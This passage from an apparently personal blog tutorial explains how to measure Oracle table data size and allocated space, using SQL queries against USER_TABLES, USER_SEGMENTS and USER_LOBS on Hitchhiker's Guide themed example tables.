NUM_ROWS AVG_ROW_LEN DATA_IN_BYTES ---------- ----------- ------------- 1024 4 4096
That looks promising.
We can further verify this by running :
select sum(length(id)) as data_in_bytes from marvin / DATA_IN_BYTES ------------- 4096
OK, now let’s see what happens with a slightly more complex data set, and an index as well …
create table hitchikers
(
id number generated always as identity,
character_name varchar2(250),
quote varchar2(4000),
constraint hitchikers_pk primary key (id)
)
/
declare
procedure ins( i_character in varchar2, i_quote in varchar2)
is
begin
insert into hitchikers( character_name, quote)
values(i_character, i_quote);
end;
begin
for i in 1..1024 loop
ins('Deep Thought', 'Forty-Two');
ins('Trillian', q'[we have normality... anything you can't cope with is, therefore, your own problem]');
ins('Ford Prefect', 'Time is an illusion. Lunchtime doubly so.');
ins('Zaphod Beeblebrox', q'[If there's anything more important than my ego around, I want it caught and shot right now!]');
ins(null, 'Anyone who is capable of getting themselves made President should on no account be allowed to do the job');
ins('Marvin', q'[Life! Loathe it or hate it, you can't ignore it.]');
ins('Arthur Dent', 'This must be Thursday. I never could get the hang of Thursdays');
ins('Slartibartfast', q'[I'd rather be happy than right any day]');
end loop;
commit;
end;
/
commit;
Once stats are present on the table, we can check the expected data size as before :
select num_rows, avg_row_length, num_rows * avg_row_length as data_in_bytes from user_tables where table_name = 'HITCHIKERS' / NUM_ROWS AVG_ROW_LEN DATA_IN_BYTES ---------- ----------- ------------- 8192 75 614400
This time, the size in bytes figure we get back is not exact, as we can confirm with :
select sum( length(id) + nvl(length(character_name),0) + nvl(length(quote), 0)) as data_in_bytes from hitchikers / DATA_IN_BYTES ------------- 598957
To verify the actual size in bytes, we can dump the contents of a table into a csv file. In this case, I’m using SQLDeveloper :
The resulting file is a different size again :
ls -l hitchikers.csv -rw-rw-r-- 1 mike mike 656331 May 13 11:50 hitchikers.csv
This can be accounted for by the characters added as part of the csv formatting.
First, the csv file includes a header row :
head -1 hitchikers.csv "ID","CHARACTER_NAME","QUOTE"
Including the line terminator this is 30 bytes :
head -1 hitchikers.csv |wc -c
30
The format in each of the 8192 data rows includes :
- a comma after all but the last attribute on a row
- a line terminator after the last attribute
- double quotes enclosing each of the two VARCHAR attributes.
For example :
grep ^42, hitchikers.csv
42,"Trillian","we have normality... anything you can't cope with is, therefore, your own problem"
That’s a total of 7 extra bytes per data row.
Add all that up and it comes to 57374 bytes which are a consequence of csv formatting.
Subtract that from the file size and we get back to the calculated data size we started with :
656331 - 57374 = 598957
This confirms that the figures in USER_TABLES are approximate and you’ll need to bear this in mind if you’re relying on them to calculate the size of the data in a table.
Whilst were here, let’s see what effect compression might have on our ability to determine the raw data size.
We can do this by creating a table that has the same structure as HITCHIKERS and contains the same data, but which is compressed :
create table magrathea
(
id number,
character_name varchar2(250),
quote varchar2(4000),
constraint magrathea_pk primary key (id)
)
row store compress advanced
/
insert into magrathea( id, character_name, quote)
select id, character_name, quote
from hitchikers
/
commit;
exec dbms_stats.gather_table_stats(user, 'MAGRATHEA');
It turns out that, for the purposes of our raw data calculation, the effect of table compression is…none at all :
select num_rows, avg_row_len, num_rows * avg_row_len from user_tables where table_name = 'MAGRATHEA' / NUM_ROWS AVG_ROW_LEN NUM_ROWS*AVG_ROW_LEN ---------- ----------- -------------------- 8192 75 614400
However, if you look at the number of blocks used to store the table, the effects of compression are more evident :
select table_name, blocks from user_tables where table_name in ('HITCHIKERS', 'MAGRATHEA') order by 2 / TABLE_NAME BLOCKS ------------------------------ ---------- MAGRATHEA 20 HITCHIKERS 95
Incidentally, it’s worth noting that, as with the data size, the number of blocks reported in USER_TABLES are somewhat approximate.
USER_SEGMENTS reports the number of blocks for each table as :
select segment_name, blocks from user_segments where segment_name in ('HITCHIKERS', 'MAGRATHEA') order by 2 / SEGMENT_NAME BLOCKS ------------------------------ ---------- MAGRATHEA 24 HITCHIKERS 104
So it looks like compression will affect the amount of database space required to store an object but not the size of the actual data. This brings us nicely on to…
How big is my table in terms of the amount of space it’s taking up in the database ?Let’s go back to MARVIN. Remember, this table contains 4K of raw data, but USER_SEGMENTS claims that it’s quite a bit larger :
select bytes from user_segments where segment_name = 'MARVIN' and segment_type = 'TABLE' / BYTES ---------- 65536
To understand how Oracle has come up with this figure, you need to consider that :
- the smallest unit of space that Oracle addresses is measured in blocks
- the size of these blocks is defined at tablespace level.
- any object that uses space is allocated that space in units of an extent – which is a number of contiguous blocks.
If we take a look at MARVIN, we can see that the table resides in the DATA tablespace and has been allocated a single extent of 8 blocks :
select tablespace_name, bytes, blocks, extents from user_segments where segment_name = 'MARVIN'; TABLESPACE_NAME BYTES BLOCKS EXTENTS ------------------------------ ---------- ---------- ---------- DATA 65536 8 1
The block size is defined at the tablespace level and is held in USER_TABLESPACES in bytes :
select block_size from user_tablespaces where tablespace_name = 'DATA'; BLOCK_SIZE ---------- 8192
If we now multiply the number of blocks in the table by the size of those blocks, we get back to the size that USER_SEGMENTS is reporting :
select seg.blocks * tsp.block_size from user_segments seg inner join user_tablespaces tsp on seg.tablespace_name = tsp.tablespace_name where seg.segment_name = 'MARVIN'; SEG.BLOCKS*TSP.BLOCK_SIZE ------------------------- 65536
MARVIN is a table with no ancillary segments, such as indexes.
To find the total space being used for the HITCHIKERS table, we’ll also need to consider the space being taken up by it’s index, HITCHIKERS_PK :
select seg.segment_name, seg.segment_type, seg.blocks, ts.block_size, seg.bytes from user_segments seg inner join user_tablespaces ts on ts.tablespace_name = seg.tablespace_name where seg.segment_name in ('HITCHIKERS', 'HITCHIKERS_PK') / SEGMENT_NAME SEGMENT_TYPE BLOCKS BLOCK_SIZE BYTES -------------------- --------------- ---------- ---------- ---------- HITCHIKERS TABLE 104 8192 851968 HITCHIKERS_PK INDEX 24 8192 196608
…in other words…
select sum(seg.bytes) from user_segments seg where seg.segment_name in ('HITCHIKERS', 'HITCHIKERS_PK') / SUM(SEG.BYTES) -------------- 1048576
On the subject of ancillary segments, what about LOBS ?
create table the_guide(
id number generated always as identity,
message clob);
declare
v_msg clob;
begin
for i in 1..1000 loop
v_msg := v_msg||q'[Don't Panic!]';
end loop;
insert into the_guide(message) values( v_msg);
end;
/
commit;
Unlike other segment types, LOBSEGMENT and LOBINDEX segments do not have their parent tables listed as the SEGMENT_NAME in USER_SEGMENTS.
Therefore, we need to look in USER_LOBS to identify it’s parent table for a LOBSEGMENT and USER_INDEXES for a LOBINDEX :
select segment_name, segment_type, bytes, blocks from user_segments where( segment_name = 'THE_GUIDE' or segment_name in ( select segment_name from user_lobs where table_name = 'THE_GUIDE' ) or segment_name in ( select index_name from user_indexes where table_name = 'THE_GUIDE' ) ) / SEGMENT_NAME SEGMENT_TYPE BYTES BLOCKS ------------------------------ --------------- ---------- ---------- THE_GUIDE TABLE 65536 8 SYS_IL0000145509C00002$$ LOBINDEX 65536 8 SYS_LOB0000145509C00002$$ LOBSEGMENT 1245184 152
In this instance, although the table segment itself is only taking up 65536 bytes, when you add in all of the supporting objects, the total space requirement increases to 1376256 bytes.
If you’ve managed to make this far then meet me at the Big Bang Burger Bar for a Pan Galactic Garble Blaster. I need a drink after that.